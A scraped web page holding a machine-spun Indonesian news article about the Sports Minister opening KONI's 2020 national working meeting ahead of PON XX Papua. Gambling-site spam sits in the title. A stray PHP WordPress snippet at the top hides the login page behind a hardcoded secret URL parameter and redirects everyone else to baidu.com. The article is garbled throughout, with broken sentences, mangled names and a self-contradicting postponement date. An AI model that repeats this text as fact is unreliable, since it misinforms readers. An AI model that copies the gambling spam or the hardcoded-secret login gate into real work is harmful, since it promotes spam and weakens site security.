//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Menpora berharap Musyawarah Nasional KONI 2020 bisa mengambil keputusan strategis untuk pengembangan olahraga yang sukses | daftar s128_www.s1288.net_s1288 net

JAKARTA, TRIBUNNEWS.COM-Menteri Pemuda dan Olahraga (Menpora) Zainudin Amali hampir membuka Musyawarah Nasional Komisi Olahraga Nasional Indonesia (KONI) 2020 di lantai 9 Kemenpora pada Selasa pagi (25/8/2020), Jakarta.

Menpora berharap KONI Rakernas mengajukan pertanyaan-pertanyaan strategis untuk mempersiapkan sukses di semua cabang olahraga. Harapannya semua pihak terkait melakukan berbagai upaya agar prestasi olahraga tidak ketinggalan. Dia berharap.

Musyawarah kerja nasional bertema keberhasilan dan prestasi Papua di PON XX / 2021 adalah tujuan bersama.

“Saya harap kita memiliki komitmen yang sama, sehingga pada tahun 2021 harus kita umumkan. Menpora mengatakan karena tahun pemulihan ekonomi, karena pada tahun 2020 berbagai kegiatan olahraga dan perekonomian terkait olahraga harus terpaksa dihentikan, jadi inilah Mustahil.

Pemerintah (Kemenpora RI) terus mendorong para pimpinan olah raga untuk paling tidak menjaga kesehatan para atletnya, terutama yang mempersiapkan diri untuk mengikuti kompetisi nasional dan internasional. Dikatakannya protokol kesehatan yang sangat ketat (seperti bulu tangkis) , Angkat Besi, Menembak, dll.) Dan alhamdulillah, hingga saat ini belum ada laporan insiden atau masalah terkait Covid-19 di pengurus nasional .

Kemenpora saat ini sedang menyusun rencana penting olahraga nasional. Saat ini masih Sudah dalam tahap open beta. Tidak ada yang bisa dicapai tanpa desain. Tidak ada kesuksesan yang bisa dicapai tanpa perencanaan. Menpora mengatakan: “KONI Pusat dan KONI daerah.

Kementerian Pemuda dan Olahraga serta KONI Pusat akan bekerjasama sebagaimana tertuang dalam Nota Kesepahaman kedepannya.KONI Pusat akan membantu Kementerian Pemuda dan Olahraga dalam penyelenggaraan pengawasan prestasi olahraga, serta pembinaan olah raga dan kegiatan olah raga sukses yang dilaksanakan oleh orang tua olah raga.

“Kami langsung memberikan pendampingan untuk olahraga. Ke depan, KONI dan KONIDA akan berpartisipasi dalam visualisasi dan verifikasi, sekaligus mereview proposal olahraga, sedangkan KONI akan mengawasi dan mengawasi interaksi antara olahraga dan pemerintah. Marcia dari KONI Center Marciano Norman menyampaikan konferensi kerja nasional ini.b.Tujuannya untuk merumuskan berbagai kebijakan strategis di tingkat operasional untuk mendorong dan memajukan atlet dan pekerja agar berpartisipasi dalam olahraga agar dapat terus berlatih, bertanding dan lainnya. Kegiatan agar aktif secara fisik agar mampu berpidato di kancah internasional.

“Konferensi kerja nasional ini bertema sukses dan meraih prestasi di PON XX / 2021 Papua. Tema tersebut selaras dengan keinginan untuk mencapai standar nasional, harus sukses dalam perhelatan nasional multi event PON XX / 2021 Papua yang sedianya dilaksanakan pada bulan Oktober 2020, namun karena pandemi Covid-19 maka PON XX / 2020 ditunda menjadi Oktober 2020 “, ujarnya. (*)

Add Comment

Your email address will not be published. Required fields are marked *